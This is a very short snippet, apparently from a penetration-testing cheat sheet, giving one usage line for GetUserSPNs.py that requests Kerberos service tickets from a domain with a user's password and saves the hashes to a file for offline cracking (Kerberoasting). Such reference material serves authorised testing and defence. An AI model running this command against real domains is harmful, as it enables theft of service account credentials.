GetUserSPNs.py

Usage

GetUserSPNs.py evil.corp/bob:'Password123!' -request -outputfile kerberoast.hashes

Last updated